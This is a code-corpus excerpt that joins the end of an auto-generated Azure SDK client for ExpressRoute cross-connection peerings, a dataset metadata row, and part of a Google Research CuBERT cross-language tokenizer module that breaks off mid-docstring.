raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteCrossConnections/{crossConnectionName}/peerings/{peeringName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
cross_connection_name, # type: str
peering_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes the specified peering from the ExpressRouteCrossConnection.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param cross_connection_name: The name of the ExpressRouteCrossConnection.
:type cross_connection_name: str
:param peering_name: The name of the peering.
:type peering_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the ARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
cross_connection_name=cross_connection_name,
peering_name=peering_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'crossConnectionName': self._serialize.url("cross_connection_name", cross_connection_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteCrossConnections/{crossConnectionName}/peerings/{peeringName}'} # type: ignore
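    # Usage sketch (illustrative names, not from this file). The returned
    # LROPoller blocks until the long-running delete finishes when
    # `.result()` is called:
    #
    #   poller = client.express_route_cross_connection_peerings.begin_delete(
    #       'my-rg', 'my-cross-connection', 'AzurePrivatePeering')
    #   poller.result()  # returns None once the peering is deleted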
def get(
self,
resource_group_name, # type: str
cross_connection_name, # type: str
peering_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.ExpressRouteCrossConnectionPeering"
"""Gets the specified peering for the ExpressRouteCrossConnection.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param cross_connection_name: The name of the ExpressRouteCrossConnection.
:type cross_connection_name: str
:param peering_name: The name of the peering.
:type peering_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ExpressRouteCrossConnectionPeering, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_11_01.models.ExpressRouteCrossConnectionPeering
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ExpressRouteCrossConnectionPeering"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-11-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'crossConnectionName': self._serialize.url("cross_connection_name", cross_connection_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ExpressRouteCrossConnectionPeering', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteCrossConnections/{crossConnectionName}/peerings/{peeringName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
cross_connection_name, # type: str
peering_name, # type: str
peering_parameters, # type: "_models.ExpressRouteCrossConnectionPeering"
**kwargs # type: Any
):
# type: (...) -> "_models.ExpressRouteCrossConnectionPeering"
cls = kwargs.pop('cls', None) # type: ClsType["_models.ExpressRouteCrossConnectionPeering"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-11-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'crossConnectionName': self._serialize.url("cross_connection_name", cross_connection_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(peering_parameters, 'ExpressRouteCrossConnectionPeering')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('ExpressRouteCrossConnectionPeering', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('ExpressRouteCrossConnectionPeering', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteCrossConnections/{crossConnectionName}/peerings/{peeringName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
cross_connection_name, # type: str
peering_name, # type: str
peering_parameters, # type: "_models.ExpressRouteCrossConnectionPeering"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.ExpressRouteCrossConnectionPeering"]
"""Creates or updates a peering in the specified ExpressRouteCrossConnection.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param cross_connection_name: The name of the ExpressRouteCrossConnection.
:type cross_connection_name: str
:param peering_name: The name of the peering.
:type peering_name: str
:param peering_parameters: Parameters supplied to the create or update
ExpressRouteCrossConnection peering operation.
:type peering_parameters: ~azure.mgmt.network.v2020_11_01.models.ExpressRouteCrossConnectionPeering
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the ARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either ExpressRouteCrossConnectionPeering or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2020_11_01.models.ExpressRouteCrossConnectionPeering]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.ExpressRouteCrossConnectionPeering"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
cross_connection_name=cross_connection_name,
peering_name=peering_name,
peering_parameters=peering_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('ExpressRouteCrossConnectionPeering', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'crossConnectionName': self._serialize.url("cross_connection_name", cross_connection_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteCrossConnections/{crossConnectionName}/peerings/{peeringName}'} # type: ignore
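    # Usage sketch (illustrative; assumes the caller has built an
    # ExpressRouteCrossConnectionPeering model named `parameters`):
    #
    #   peering = client.express_route_cross_connection_peerings.begin_create_or_update(
    #       'my-rg', 'my-cross-connection', 'AzurePrivatePeering',
    #       peering_parameters=parameters).result()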
| [
"[email protected]"
] | |
5f5dde92fc0731fe57b059f701415c7b9373889a | 21579091a548f9ee5dd085050c5627811d27c22b | /cubert/unified_tokenizer.py | 065f1eedc313ae3c86e52c7a18c96c8f38a8d544 | [
"CC-BY-4.0",
"Apache-2.0"
] | permissive | lethaiq/google-research | 0e78ab28d153709d12efcfafdec189d86f5200af | 8f1c8664a1423aa734218ab7e34997dcf01341ce | refs/heads/master | 2022-12-16T05:52:45.912470 | 2020-09-16T16:36:38 | 2020-09-16T16:36:38 | 295,827,269 | 0 | 0 | null | 2020-09-15T19:19:12 | 2020-09-15T19:19:12 | null | UTF-8 | Python | false | false | 29,313 | py | # coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Cross-language tokenization library."""
import enum
import token as python_token
import tokenize
from typing import List, Mapping, Sequence, Text, Tuple
from absl import logging
import dataclasses
import regex # Using instead of `re` because it handles Unicode classes.
import six
# Log level of pedantic messages.
_PEDANTIC = 5
# Punctuation for tokenization.
SENTINEL = '^'
SENTINEL_ESCAPE = 'CARET'
@enum.unique
class TokenKind(enum.Enum):
"""The kind of language-agnostic tokens."""
NONE = 0 # Sadly, Python2 doesn't support enum.auto()
PUNCTUATION = 1
KEYWORD = 2
IDENTIFIER = 3
STRING = 4
COMMENT = 5
NEWLINE = 6
EOS = 7
ERROR = 8
NUMBER = 9
WHITESPACE = 10
@dataclasses.dataclass(frozen=True)
class TokenMetadata():
pass
@dataclasses.dataclass(frozen=True)
class AbstractToken():
spelling: str
kind: TokenKind
metadata: TokenMetadata
@dataclasses.dataclass(frozen=True)
class AbstractMultiToken():
# We force `spellings` to be a concrete `Tuple`, to simplify equality checks
# and hashing. Otherwise, `spellings=[1, 2, 3]` and `spellings=(1, 2, 3)`
# would result in different multi-tokens.
spellings: Tuple[str, ...]
kind: TokenKind
metadata: TokenMetadata
def multi_token_from_token(token):
return AbstractMultiToken(spellings=(token.spelling,),
kind=token.kind,
metadata=token.metadata)
_KINDS_TO_SPLIT_LIKE_WHITESPACE = (TokenKind.COMMENT, TokenKind.STRING,
TokenKind.WHITESPACE)
_KINDS_TO_SPLIT_BY_LENGTH = (TokenKind.COMMENT, TokenKind.STRING,
TokenKind.NUMBER, TokenKind.IDENTIFIER,
TokenKind.WHITESPACE)
_UPPERCASE = r'\p{Lu}'
_TITLECASE = r'\p{Lt}'
# Here we abuse the term "lowercase", by using it to refer to anything that
# doesn't cause a camel/Pascal case split. For Python, for example, this
# includes Unicode category Nd ("decimal numbers") and Nl ("number letters").
# We assume that before these regular expressions are applied, any
# characters that don't fall into a legal "other" category have been checked.
_LOWERCASE = r'[^\p{Lu}\p{Lt}]'
# In what follows, L, U, and T will be replaced with _LOWERCASE, _UPPERCASE
# and _TITLECASE later.
_CAMEL_AFTER_SNAKE_EXPRESSIONS = [
# Beginning lowercase.
r'^{L}+',
# A single titlecase followed by 0 or more lowercase.
r'{T}{L}*',
# Single uppercase followed by multiple lowercase.
r'{U}{L}+',
# Multiple uppercase ending right before a titlecase.
r'{U}+(?={T})',
# Multiple uppercase ending right before an uppercase followed by lowercase.
r'{U}+(?={U}{L})',
# Multiple uppercase to the end.
r'{U}+$',
]
_CAMEL_AFTER_SNAKE_EXPRESSION = '|'.join(_CAMEL_AFTER_SNAKE_EXPRESSIONS).format(
L=_LOWERCASE,
T=_TITLECASE,
U=_UPPERCASE)
_CAMEL_RE = regex.compile(_CAMEL_AFTER_SNAKE_EXPRESSION, regex.U) # pytype: disable=module-attr
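# A quick illustration of the camel-case splitter on ASCII inputs (comments
# only; not part of the original module):
#
#   _CAMEL_RE.findall('HTMLParser')  # -> ['HTML', 'Parser']
#   _CAMEL_RE.findall('camelCase')   # -> ['camel', 'Case']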
class StateType(enum.IntEnum):
INITIAL_STATE = 0
UPPERCASE_STATE = 1
LOWERCASE_STATE = 2
NUMBER_STATE = 3
SPECIAL_STATE = 4
def code_to_tokens(code):
"""Convert Python source code to list of tokens.
Removes all trailing whitespace and then tokenizes the text as if it were
Python source code. Tokens are 5-tuples as used by the built-in tokenize
module.
Args:
code: string containing python source code
Returns:
A list of token 5-tuples as produced by `tokenize.generate_tokens`.
Raises:
tokenize.TokenError: When a multi-line token is incomplete. This is
generated by `tokenize.generate_tokens`.
IndentationError: When the source code is incorrectly indented. This is
generated by `tokenize.generate_tokens`.
"""
token_tuples = list(tokenize.generate_tokens(
six.StringIO(code.rstrip()).readline))
logging.vlog(5, 'Code `%s` was tokenized to token tuples `%s`.', code,
token_tuples)
# Now we get rid of an extraneous trailing newline token, if it has been
# produced. This is a difference in the behavior of generate_tokens between
# Python 2 and Python 3.
if six.PY3:
if len(token_tuples) > 1:
if token_tuples[-2][0] == python_token.NEWLINE:
del token_tuples[-2]
logging.vlog(5, 'Tokenization for `%s` was sanitized. Now token tuples '
'are `%s`.', code, token_tuples)
# Another similar failure mode is if the final tokens are DEDENT, there may
# be an extraneous newline before them.
if len(token_tuples) > 2:
current = len(token_tuples) - 2 # Right before ENDMARKER.
while current and token_tuples[current][0] == tokenize.DEDENT:
current -= 1
if current and token_tuples[current][0] == tokenize.NEWLINE:
del token_tuples[current]
logging.vlog(5, 'Tokenization for `%s` was sanitized to remove '
'trailing newline after DEDENTs. Now token tuples are '
'`%s`.', code, token_tuples)
return token_tuples
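# Example sketch (Python 3; symbolic names stand in for the integer codes of
# the `token` module, and the synthetic trailing NEWLINE is removed by the
# sanitization above):
#
#   [tok[:2] for tok in code_to_tokens('x = 1')]
#   # -> [(NAME, 'x'), (OP, '='), (NUMBER, '1'), (ENDMARKER, '')]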
def code_to_tokens_simple_lossless(code):
r"""Convert python source code to list of tokens.
This is a simple version using spacing and different classes of characters to
tokenize a string.
A sentence will be split at "|" in the following patterns:
upper | upper lower
upper | number
upper | special
lower | upper
lower | number
lower | special
number | upper
number | lower
number | special
special | upper
special | lower
special | number
In addition to splits caused by the type changes above, the code is also split
at whitespace. However, a sequence of spaces or tabs will not be split unless
its length is longer than 20.
For example: "12345 \n\n678" -> ["12345", " ", "\n", "\n", "678"]
We do not split sequences of spaces/tabs to avoid long sequences of single
" " or "\t" tokens caused by deep indentation.
This tokenizer uses a finite state machine. The definition of the states is in
the StateType class.
Args:
code: String containing Python source code.
Returns:
The code represented as a list of token strings.
For example, "foo ,1" -> ["foo", " ", ",", "1"]
"""
# normal state transitions that will result in splitting
normal_transitions = [
(StateType.UPPERCASE_STATE, StateType.NUMBER_STATE),
(StateType.UPPERCASE_STATE, StateType.SPECIAL_STATE),
(StateType.LOWERCASE_STATE, StateType.UPPERCASE_STATE),
(StateType.LOWERCASE_STATE, StateType.NUMBER_STATE),
(StateType.LOWERCASE_STATE, StateType.SPECIAL_STATE),
(StateType.NUMBER_STATE, StateType.UPPERCASE_STATE),
(StateType.NUMBER_STATE, StateType.LOWERCASE_STATE),
(StateType.NUMBER_STATE, StateType.SPECIAL_STATE),
(StateType.SPECIAL_STATE, StateType.UPPERCASE_STATE),
(StateType.SPECIAL_STATE, StateType.LOWERCASE_STATE),
(StateType.SPECIAL_STATE, StateType.NUMBER_STATE)]
# output, state
tokens = []
state = StateType.INITIAL_STATE
next_state = None
memory = []
for i, inputchar in enumerate(code):
if inputchar.isupper():
next_state = StateType.UPPERCASE_STATE
elif inputchar.islower():
next_state = StateType.LOWERCASE_STATE
elif inputchar.isdigit():
next_state = StateType.NUMBER_STATE
else:
next_state = StateType.SPECIAL_STATE
# splitting cases
if (state, next_state) in normal_transitions:
tokens.append(''.join(memory))
memory = []
elif (state, next_state) == (StateType.UPPERCASE_STATE,
StateType.LOWERCASE_STATE) and len(memory) > 1:
tokens.append(''.join(memory[:-1]))
memory = [memory[-1]]
elif (state, next_state) == (StateType.SPECIAL_STATE,
StateType.SPECIAL_STATE):
if inputchar in [' ', '\t'] and inputchar == code[i-1]:
if len(memory) >= 20:
tokens.append(''.join(memory))
memory = []
elif inputchar.isspace() or code[i-1].isspace():
tokens.append(''.join(memory))
memory = []
# put inputchar into memory, always
memory.append(inputchar)
state = next_state
if memory:
tokens.append(''.join(memory))
return tokens
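# Example, as traced through the state machine above (case changes and
# letter/digit boundaries split; single spaces are kept as tokens):
#
#   code_to_tokens_simple_lossless('fooBar1 = 2')
#   # -> ['foo', 'Bar', '1', ' ', '=', ' ', '2']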
def subtokenize_identifier(identifier):
"""Splits an identifier assuming camel/pascal/snake case conventions.
This doesn't attempt to classify the identifier as one of snake case/camel/
pascal, etc. It just applies all possible splits in the order snake case,
Pascal, camel.
This doesn't check whether an identifier is a legal identifier for some
language. It is assumed that the caller has already decided that.
For Unicode characters in identifiers, we define splitting conventions as
follows:
- Snake-case is only defined in terms of the ASCII underscore (U+005F). Other
characters that may look like an underscore do not introduce a snake-case
component.
- For the purpose of Pascal and camel cases, we categorize only the Lu Unicode
category as uppercase characters, with the exception of the Lt (titlecase)
character category. Lt characters are treated as a sequence of an uppercase
character followed by a lowercase character and, as such, may only appear
in the beginning of a Pascal-case component, but not as an all-uppercase
component. As an example, if U, L, T are uppercase, lowercase, and titlecase
characters as defined above (i.e., members of Lu, everything else, or Lt
categories, respectively), UUUT would be split as UUU and T, ULTL would be
split as UL and TL, LTL would be split as L and TL, etc.
Args:
identifier: A non-empty string, purporting to be an identifier. Assumes its
validity as an identifier in a given language has already been established
by the caller.
Returns:
A list of substrings of `identifier`. Joining the substrings should return
the original `identifier` exactly.
Raises:
ValueError: if `identifier` is not a legal identifier string.
"""
snake_splits = identifier.split('_')
snake_components = [] # type: List[Text]
current_snake_separator = [] # type: List[Text]
for snake_split in snake_splits:
if snake_split:
snake_components.append(''.join(current_snake_separator))
current_snake_separator = []
snake_components.append(snake_split)
current_snake_separator.append('_')
# Emit the final separator, but discard the most recent underscore added to
# it. It should have at least one.
current_snake_separator.pop()
if current_snake_separator:
snake_components.append(''.join(current_snake_separator))
# Now we want to do camel-case splitting for each non-underscore snake
# component.
logging.vlog(_PEDANTIC, 'Split %r into snake case: %r', identifier,
snake_components)
all_components = [] # type: List[Text]
for snake_component in snake_components:
if '_' in snake_component:
all_components.append(snake_component)
else:
unicodified_snake_component = six.ensure_text(snake_component)
camel_components = _CAMEL_RE.findall(unicodified_snake_component)
logging.vlog(_PEDANTIC, 'Split snake component %r into %r components.',
unicodified_snake_component, camel_components)
all_components.extend(camel_components)
# Finally, we want to combine the underscore components with the component
# immediately preceding them.
non_underscore_component = ''
final_components = [] # type: List[Text]
for component in all_components:
if '_' in component:
# Found an underscore component. Combine it with the previous non-
# underscore component (if any), emit it, and clear the remembered
# non-underscore component.
combined_component = non_underscore_component + component
final_components.append(combined_component)
non_underscore_component = ''
else:
# This is a non-underscore component.
if non_underscore_component:
# We've found two consecutive non-underscore components. Emit the
# previous one, since it won't be combined with any underscores.
final_components.append(non_underscore_component)
# Remember the current non-underscore component, in case we need to
# combine it with a following underscore.
non_underscore_component = component
# We may have collected the final non-underscore component and it wasn't
# followed by underscores. Just emit it.
if non_underscore_component:
final_components.append(non_underscore_component)
assert (six.ensure_text(
''.join(final_components)) == six.ensure_text(identifier)), (
          'Ended up with different identifier when joining components %r '
'into combined %r.' % (final_components, identifier))
return final_components
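

# Illustrative sketch: underscore runs stay attached to the preceding
# component and camel humps become separate components, so joining always
# reproduces the input. The exact camel split is governed by _CAMEL_RE defined
# elsewhere in this module; the expected value below is therefore indicative.
def _demo_subtokenize_identifier():
  pieces = subtokenize_identifier('parse_HTTPResponse')
  assert ''.join(pieces) == 'parse_HTTPResponse'
  return pieces  # expected to be something like ['parse_', 'HTTP', 'Response']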
def sanitize(t, mappings):
r"""Sanitizes a token to remove "dangerous" characters, like \n and \r."""
final = t
for original, sanitized in mappings.items():
assert len(original) == 1
final = final.replace(original, sanitized)
return final
def unsanitize(t, mappings):
"""Unsanitizes a previously sanitized token."""
final = t
for original, sanitized in mappings.items():
assert len(original) == 1
final = final.replace(sanitized, original)
return final
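

# Round-trip sketch for sanitize/unsanitize with a hypothetical mapping; real
# mappings must satisfy the invariants documented in check_mappings below.
def _demo_sanitize_round_trip():
  demo_mappings = {'\n': r'\n', '\r': r'\r'}  # hypothetical, for illustration
  token = 'line1\nline2'
  sanitized = sanitize(token, demo_mappings)  # 'line1\\nline2'
  assert unsanitize(sanitized, demo_mappings) == token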
def split_long_token(token_string,
max_output_token_length):
"""Splits a token losslessly to some maximum length per component.
A long token is split into multiple tokens. For instance, `'bcd'` with
`max_output_token_length=2` will become `['bc', 'd']`. No sentinel or other
split mark is added at this stage.
A token is assumed to be non-empty.
Args:
token_string: The token.
max_output_token_length: Maximum length of an output token.
Returns:
List of split tokens.
Raises:
ValueError: if `token` is empty.
"""
if not token_string:
raise ValueError('Expected %r to be non-empty' % token_string)
whole_token_length = len(token_string)
remainder_length = whole_token_length % max_output_token_length
even_parts = list(
map(
# ...join together...
''.join,
zip(
# `max_output_token_length` copies of the iterator of
# whole_token's characters. zip will draw from the same iterator
# and return `max_output_token_length` tuples of characters from
# `whole_token`.
*[iter(token_string)] * max_output_token_length)))
remainder_part = ([token_string[-remainder_length:]]
if remainder_length else [])
split_token = even_parts + remainder_part
assert split_token, ('while wrapping >>%s<< into >%r<' %
(token_string, split_token))
assert all([
len(t) <= max_output_token_length for t in split_token
]), ('Got split_token >>>%r<<<, which contains tokens longer than %d.' %
(split_token, max_output_token_length))
return split_token
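

# Concrete example of the even/remainder split above:
#   split_long_token('abcdefg', 3) == ['abc', 'def', 'g']
def _demo_split_long_token():
  assert split_long_token('abcdefg', 3) == ['abc', 'def', 'g']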
def _agnostic_tokens_to_lists_of_token_lists(
agnostic_tokens
):
"""Turns each token into a singleton token list, keeping token kinds."""
return [multi_token_from_token(a) for a in agnostic_tokens]
def _subtokenize_identifiers_heuristically(
token_lists
):
"""Subtokenizes only identifiers in a list of token lists.
This assumes that every subtoken list is still a singleton.
Args:
token_lists: A list of labelled tokens. Each token is represented as a
(still) singleton list of subtokens.
Returns:
A list of token lists, of which the identifiers are split heuristically.
"""
with_split_identifiers: List[AbstractMultiToken] = []
for multi_token in token_lists:
# spelling_list had better still be a singleton.
assert len(multi_token.spellings) == 1, (
'Expected %r to be a singleton, but it is not.' % multi_token)
if multi_token.kind is TokenKind.IDENTIFIER:
subtokenized = dataclasses.replace(
multi_token,
spellings=subtokenize_identifier(multi_token.spellings[0]))
with_split_identifiers.append(subtokenized)
else:
with_split_identifiers.append(multi_token)
return with_split_identifiers
def _subtokenize_strings_heuristically(
token_lists
):
"""Splits STRING, COMMENT, WHITESPACE tokens like text.
Args:
token_lists: List of subtoken lists, of which only those of kind IDENTIFIER
are allowed not to be singletons.
Returns:
A list of token lists, of which IDENTIFIER, STRING, NUMBER, COMMENT tokens
are now split heuristically.
"""
with_heuristically_split_text: List[AbstractMultiToken] = []
for multi_token in token_lists:
if multi_token.kind in _KINDS_TO_SPLIT_LIKE_WHITESPACE:
assert len(multi_token.spellings) == 1, (
'Expected %r to be a singleton, but it is not.' % multi_token)
subtokenized = dataclasses.replace(
multi_token,
spellings=code_to_tokens_simple_lossless(multi_token.spellings[0]))
with_heuristically_split_text.append(subtokenized)
else:
with_heuristically_split_text.append(multi_token)
return with_heuristically_split_text
def _shorten_subtokens(
token_lists,
max_output_token_length,
):
"""Further subtokenizes any subtokens that are too long.
At this point, we're done with all heuristic splitting. Now split what's left
by length if need be. We don't do anything about keywords or other
punctuation.
Args:
token_lists: List of subtoken lists, of which only those of kinds
IDENTIFIER, NUMBER, STRING, COMMENT may have been subtokenized.
max_output_token_length: The max character length for each subtoken of
the subtokenizable kinds.
Returns:
Subtokenized tokens up to a maximum per-subtoken length.
"""
shortened_subtokens: List[AbstractMultiToken] = []
for multi_token in token_lists:
if multi_token.kind in _KINDS_TO_SPLIT_BY_LENGTH:
shortened_spelling_list: List[str] = []
for spelling in multi_token.spellings:
shortened_spelling_list.extend(
split_long_token(spelling, max_output_token_length))
shortened_subtokens.append(
dataclasses.replace(
multi_token, spellings=tuple(shortened_spelling_list)))
else:
shortened_subtokens.append(multi_token)
return shortened_subtokens
def split_agnostic_tokens(
agnostic_tokens,
max_output_token_length,
):
"""Splits each language-agnostic token according to its kind.
Args:
agnostic_tokens: The language-agnostic tokens to subtokenize. These are
pairs of spelling and generic token kind. No subtokenization has been
done; the tokens are as the language-specific lexer produced them.
max_output_token_length: The target maximum output token length.
Returns:
A list of subtoken lists, with their associated token kind.
"""
# Prepare for subtokenization.
agnostic_token_lists = _agnostic_tokens_to_lists_of_token_lists(
agnostic_tokens)
# Perform heuristic subtokenizations.
with_identifiers_heuristically_split = _subtokenize_identifiers_heuristically(
agnostic_token_lists)
with_string_tokens_heuristically_split = _subtokenize_strings_heuristically(
with_identifiers_heuristically_split)
# Shorten resulting subtokens by length.
shortened_subtokens = _shorten_subtokens(
with_string_tokens_heuristically_split, max_output_token_length)
return shortened_subtokens
def sanitize_subtoken_lists(
subtoken_lists,
sanitization_mapping,
sentinel):
"""Sanitizes lists of subtoken lists, adding sentinels.
Args:
subtoken_lists: A list of subtoken lists, one list per initial language
token. Cannot be empty or contain empty sublists.
sanitization_mapping: A mapping from sensitive characters to replacement
strings. It is assumed to have been checked by `check_mappings`.
sentinel: The sentinel character. It is expected to be one of the keys
in `sanitization_mapping`.
Returns:
A list of subtoken lists representing the entire original sequence.
Raises:
ValueError: If one of the input sublists is empty, or the entire input
is empty, or the sentinel is not one of the unsanitary characters.
"""
if not subtoken_lists:
    raise ValueError('Received empty input %r but expected it to be '
                     'non-empty' % subtoken_lists)
if sentinel not in sanitization_mapping:
raise ValueError('Sentinel %r should be in the sanitization map %r '
'but is not.' % (sentinel, sanitization_mapping))
sanitized_lists = []
for spelling_list in subtoken_lists:
if not spelling_list:
raise ValueError('Received empty sublist %r but expected no sublist '
'to be empty' % subtoken_lists)
sanitized_list = [
sanitize(t, sanitization_mapping)
for t in spelling_list
]
# Add the sentinel to all subtokens except the last one.
with_sentinel = [
t + sentinel for t in sanitized_list[:-1]] + [sanitized_list[-1]]
sanitized_lists.append(with_sentinel)
return sanitized_lists
def flatten_subtoken_lists(
subtoken_lists):
"""Flattens lists of subtoken lists.
Args:
subtoken_lists: A list of subtoken lists, one list per initial language
      token. Cannot be empty or contain empty sublists.
Returns:
A list of flattened subtokens representing the entire original sequence.
Raises:
ValueError: If the input is empty.
"""
if not subtoken_lists:
    raise ValueError('Received empty input %r but expected it to be '
                     'non-empty' % subtoken_lists)
subtokens = sum(subtoken_lists, [])
return subtokens
def flatten_and_sanitize_subtoken_lists(
subtoken_lists,
sanitization_mapping,
sentinel):
"""Sanitizes and then flattens lists of subtoken lists, adding sentinels.
Args:
subtoken_lists: A list of subtoken lists, one list per initial language
      token. Cannot be empty or contain empty sublists.
sanitization_mapping: A mapping from sensitive characters to replacement
